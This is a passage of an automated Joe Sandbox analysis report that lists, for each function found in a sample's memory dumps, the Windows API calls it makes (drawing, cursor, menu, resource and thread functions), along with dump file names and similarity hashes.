                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetDesktopWindow.USER32 ref: 02A08155
                                                                                                                                            • GetDesktopWindow.USER32 ref: 02A08285
                                                                                                                                            • SetCursor.USER32(00000000), ref: 02A082DA
                                                                                                                                              • Part of subcall function 02A13C30: ImageList_EndDrag.COMCTL32(?,-00000010,02A082B5), ref: 02A13C4C
                                                                                                                                            • SetCursor.USER32(00000000), ref: 02A082C5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CursorDesktopWindow$DragImageList_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 617806055-0
                                                                                                                                            • Opcode ID: 1bdd4767b87347b1074dedf747a919fc1f7b8416dc3030de6393e235d66e50b8
                                                                                                                                            • Instruction ID: 953c95a8ed789a3b95055edf4d3b8bec26bd10f76b7b6297f732b8f6ee9bd51d
                                                                                                                                            • Opcode Fuzzy Hash: 1bdd4767b87347b1074dedf747a919fc1f7b8416dc3030de6393e235d66e50b8
                                                                                                                                            • Instruction Fuzzy Hash: 99914C38A80641CFC704EF28E2CCA557BE2BB99344F058994E844AB396CF78EC56DF45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029DF603
                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029DF61F
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029DF696
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 029DF6BF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 920484758-0
                                                                                                                                            • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                            • Instruction ID: 8a3cbed545efa40f5207b8c7f209cd7af2ade8115c3ed9c0ac1bbb4c9e6404de
                                                                                                                                            • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                            • Instruction Fuzzy Hash: 22411879A0162D9FCB61EF58CC91BD9B3BDAF48340F4081D5E54AE7611DA34AF809F60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 029DBE59
                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029DBE7D
                                                                                                                                            • GetModuleFileNameA.KERNEL32(029D0000,?,00000105), ref: 029DBE98
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029DBF2E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                            • Opcode ID: 893bd0ddfa32acb3f5d7051fefe6e5051721ccb79c6bb2c0692d7f392b167f6d
                                                                                                                                            • Instruction ID: 23ad034f84a456781e9d2981941a40bbc3933b5672f98e8625224cc5a3af99d3
                                                                                                                                            • Opcode Fuzzy Hash: 893bd0ddfa32acb3f5d7051fefe6e5051721ccb79c6bb2c0692d7f392b167f6d
                                                                                                                                            • Instruction Fuzzy Hash: 3E412F70A002589BDB21EB68CC84BDEB7FDAB58304F4184EAE548E7251DB749F84DF64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RectVisible.GDI32(00000000,?), ref: 02A0FBA4
                                                                                                                                            • SaveDC.GDI32(00000000), ref: 02A0FBC7
                                                                                                                                            • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 02A0FC07
                                                                                                                                            • RestoreDC.GDI32(00000000,00000000), ref: 02A0FC33
                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 02A0FCCC
                                                                                                                                            • FrameRect.USER32(00000000,?,00000000), ref: 02A0FCFA
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02A0FD00
                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 02A0FD10
                                                                                                                                            • FrameRect.USER32(00000000,?,00000000), ref: 02A0FD3E
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02A0FD44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 375863564-0
                                                                                                                                            • Opcode ID: 14353d01d94bebfda322915ec6a09c1c493d0961814be02524827aeb1581746e
                                                                                                                                            • Instruction ID: cb16b20e793ce020b224db047fddae30bb3df360cf50aa5dedf839835f43ab98
                                                                                                                                            • Opcode Fuzzy Hash: 14353d01d94bebfda322915ec6a09c1c493d0961814be02524827aeb1581746e
                                                                                                                                            • Instruction Fuzzy Hash: 1341D774A002499FDB14DFA8D8C5FAEBBF5AF49314F054094EA40EB6A1CB35E984CB90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 029DBE59
                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029DBE7D
                                                                                                                                            • GetModuleFileNameA.KERNEL32(029D0000,?,00000105), ref: 029DBE98
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029DBF2E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                            • Opcode ID: 54cba473ec7cee5993182b8e80f0e596d09da5d5c91c82c6be8e4df85944477a
                                                                                                                                            • Instruction ID: 13598cc8217e80437f64bf6fd22cfaa1b3cb46dc56c6161f1f9ba748bea8c756
                                                                                                                                            • Opcode Fuzzy Hash: 54cba473ec7cee5993182b8e80f0e596d09da5d5c91c82c6be8e4df85944477a
                                                                                                                                            • Instruction Fuzzy Hash: FB415E70A002589BDB21EBA8CC84BDEB7FDAB58304F4184E9E508E7251DB749F84DF64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 02A2157D
                                                                                                                                            • GetDC.USER32(00000000), ref: 02A215D2
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02A215DC
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02A215E7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDeviceKeyboardLayoutRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3331096196-0
                                                                                                                                            • Opcode ID: 6bc59b20416356819923df75c6ac041cf3dc77d8f70b6c6ba94f01f0e9b1978e
                                                                                                                                            • Instruction ID: 01406d88b6d5101692df6e4dca5adefe79174094e3976fddcc7144107926755f
                                                                                                                                            • Opcode Fuzzy Hash: 6bc59b20416356819923df75c6ac041cf3dc77d8f70b6c6ba94f01f0e9b1978e
                                                                                                                                            • Instruction Fuzzy Hash: F531F570A442418FD780EF6CD9C4B997BE6BB44318F4990B9E908CF356EB329848DF65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029F2E8C: EnterCriticalSection.KERNEL32(02A6A3A0,00000000,029F183E,00000000,029F189D), ref: 029F2E94
                                                                                                                                              • Part of subcall function 029F2E8C: LeaveCriticalSection.KERNEL32(02A6A3A0,02A6A3A0,00000000,029F183E,00000000,029F189D), ref: 029F2EA1
                                                                                                                                              • Part of subcall function 029F2E8C: EnterCriticalSection.KERNEL32(00000038,02A6A3A0,02A6A3A0,00000000,029F183E,00000000,029F189D), ref: 029F2EAA
                                                                                                                                              • Part of subcall function 029F614C: GetDC.USER32(00000000), ref: 029F61A2
                                                                                                                                              • Part of subcall function 029F614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 029F61B7
                                                                                                                                              • Part of subcall function 029F614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 029F61C1
                                                                                                                                              • Part of subcall function 029F614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,029F4D0F,00000000,029F4D9B), ref: 029F61E5
                                                                                                                                              • Part of subcall function 029F614C: ReleaseDC.USER32(00000000,00000000), ref: 029F61F0
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 029F4D11
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 029F4D2A
                                                                                                                                            • SelectPalette.GDI32(00000000,?,000000FF), ref: 029F4D53
                                                                                                                                            • RealizePalette.GDI32(00000000), ref: 029F4D5F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 979337279-0
                                                                                                                                            • Opcode ID: d1c147bc84ad60cceedd9eb37edc67e0545d77a5cdb18b51c319e0f526497dd5
                                                                                                                                            • Instruction ID: cce73b6c6590c30aed39d5d856b852ae6ac7671d25b5edace5e4adb9b2f5dd5c
                                                                                                                                            • Opcode Fuzzy Hash: d1c147bc84ad60cceedd9eb37edc67e0545d77a5cdb18b51c319e0f526497dd5
                                                                                                                                            • Instruction Fuzzy Hash: EC31F835A00614EFD794EB59D980D5EB3FAFF89320B2245A5EA049B362D730EE41DF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetMenuState.USER32(?,?,?), ref: 02A03B7F
                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 02A03B8A
                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 02A03BA3
                                                                                                                                            • GetMenuStringA.USER32(?,?,?,?,?), ref: 02A03BF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$ItemStateString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 306270399-0
                                                                                                                                            • Opcode ID: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
                                                                                                                                            • Instruction ID: 12a8ea70f489552a037921e79ea8a07c4432ae7dc37fb34d389d8940f2b37ba5
                                                                                                                                            • Opcode Fuzzy Hash: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
                                                                                                                                            • Instruction Fuzzy Hash: 6B114F31601214AFCB00EF6DDCC4EAF77E9AF8A354B1084A9F919D7290DA309D01DB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 029ED6EF
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 029ED6FE
                                                                                                                                            • EnterCriticalSection.KERNEL32(02A6A2EC), ref: 029ED743
                                                                                                                                            • InterlockedExchange.KERNEL32(02A3AAF0,?), ref: 029ED75F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2380408948-0
                                                                                                                                            • Opcode ID: 6ed72101a785511a9d6a112df832393b530c09b30b49dc4f2a5656512b17176b
                                                                                                                                            • Instruction ID: 38973543de491a1a396a380ecd2f2478856fd3a33edd73f6a24d6e92396d7c39
                                                                                                                                            • Opcode Fuzzy Hash: 6ed72101a785511a9d6a112df832393b530c09b30b49dc4f2a5656512b17176b
                                                                                                                                            • Instruction Fuzzy Hash: 0321DE70A04244BFEF02DFA8C881B69B7FDEB45B04F41C8A0E402D6691D7769980CF31
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • EnumWindows.USER32(Function_00052CA4), ref: 02A22D49
                                                                                                                                            • GetWindow.USER32(00000003,00000003), ref: 02A22D61
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 02A22D6E
                                                                                                                                            • SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 02A22DAD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$EnumLongWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4191631535-0
                                                                                                                                            • Opcode ID: 1c48f8ec7895bc3154339d6d7d4a571e2ac324249297b899fcf1e1fc8b138b94
                                                                                                                                            • Instruction ID: 49f5bcebc9fe2414575f65808a6171a76330c3669824a4116bf609fe22d76f3e
                                                                                                                                            • Opcode Fuzzy Hash: 1c48f8ec7895bc3154339d6d7d4a571e2ac324249297b899fcf1e1fc8b138b94
                                                                                                                                            • Instruction Fuzzy Hash: 1C115A30644720AFEB20AB6CCCC4F99B79AEF45724F544265FD98AB2D2C7709845CB51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                                                            • Instruction ID: 0c8c682cea9a29ace4f04e42b397fcf3ea099448f359b7cd0d1904192bd29409
                                                                                                                                            • Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                                                            • Instruction Fuzzy Hash: 7001EC6070530C2B8774BE266CC4F6B3A5EDFC5750B10807C692D8B387DE69DC05CA68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • FindResourceA.KERNEL32(?,?,?), ref: 029EA293
                                                                                                                                            • LoadResource.KERNEL32(?,029EA318,?,?,?,029E5D70,?,00000001,00000000,?,029EA1BE,00000000,?), ref: 029EA2AD
                                                                                                                                            • SizeofResource.KERNEL32(?,029EA318,?,029EA318,?,?,?,029E5D70,?,00000001,00000000,?,029EA1BE,00000000,?), ref: 029EA2C7
                                                                                                                                            • LockResource.KERNEL32(029E9E88,00000000,?,029EA318,?,029EA318,?,?,?,029E5D70,?,00000001,00000000,?,029EA1BE,00000000), ref: 029EA2D1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3473537107-0
                                                                                                                                            • Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                                                            • Instruction ID: bb1d236e224fe32d96e65d422df48ae835d9217a1f2cafbf4ed2325bd2239f81
                                                                                                                                            • Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                                                            • Instruction Fuzzy Hash: 9AF08CB32042046F5B4AEF6CA880E6B77EDEEC8360320801AF90CCB305DA35ED019B74
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 02A07F35
                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,02A07FA0,-000000F7,?,00000000,02A07B5A,?,-00000010,?), ref: 02A07F3E
                                                                                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 02A07F53
                                                                                                                                            • GetPropA.USER32(00000000,00000000), ref: 02A07F6A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2582817389-0
                                                                                                                                            • Opcode ID: 9ca88e312e7f72a549a85d855e27975b8896ecf11bde05d3092e33d6c7b9397a
                                                                                                                                            • Instruction ID: 77298fa2db1724e973e52758ab82f8a98af4ac1e4b7b9724f17d16c2cbb79f96
                                                                                                                                            • Opcode Fuzzy Hash: 9ca88e312e7f72a549a85d855e27975b8896ecf11bde05d3092e33d6c7b9397a
                                                                                                                                            • Instruction Fuzzy Hash: 8BF05D652021222793207BB4BEC08BFA28CAE807543008823FC40C3191DF28FC82E9B2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetWindowThreadProcessId.USER32(?), ref: 02A06FD5
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,?,02A03C39,?,02A02CF5), ref: 02A06FDE
                                                                                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 02A06FF3
                                                                                                                                            • GetPropA.USER32(?,00000000), ref: 02A0700A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2582817389-0
                                                                                                                                            • Opcode ID: 0ece9d76f3446d676dcd6397174f574d8b8846cad8e542e8c351fbd3248f5cc1
                                                                                                                                            • Instruction ID: ed989c92cc13dde9adfea4560b7a6d1ecc2652771aa7b11a162deab4f67348c4
                                                                                                                                            • Opcode Fuzzy Hash: 0ece9d76f3446d676dcd6397174f574d8b8846cad8e542e8c351fbd3248f5cc1
                                                                                                                                            • Instruction Fuzzy Hash: CEF0E555740120A69B30BFF47CC0C7BB68D8A447A03004E71FD42D7242DF35EC42AAB0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02A22514
                                                                                                                                            • SetWindowsHookExA.USER32(00000003,02A224B8,00000000,00000000), ref: 02A22524
                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A2253F
                                                                                                                                            • CreateThread.KERNEL32(00000000,000003E8,02A2245C,00000000,00000000), ref: 02A22563
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread$CurrentEventHookWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1195359707-0
                                                                                                                                            • Opcode ID: 5a0a4af3887cfb8c6437333ff0b921ca724b304068aa838b2b8af52f1c91a505
                                                                                                                                            • Instruction ID: eabda69663a0924a6c1c52d882f205e909ba22dc65ac587a6dd30e96521ab80a
                                                                                                                                            • Opcode Fuzzy Hash: 5a0a4af3887cfb8c6437333ff0b921ca724b304068aa838b2b8af52f1c91a505
                                                                                                                                            • Instruction Fuzzy Hash: AEF05E70EC0310FEF720AB28AC7AF2536A9E300B06F10C815FA00BA0C2CFB4509A8E15
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F7621
                                                                                                                                            • SelectObject.GDI32(00000000,058A00B4), ref: 029F7633
                                                                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 029F763E
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 029F764F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
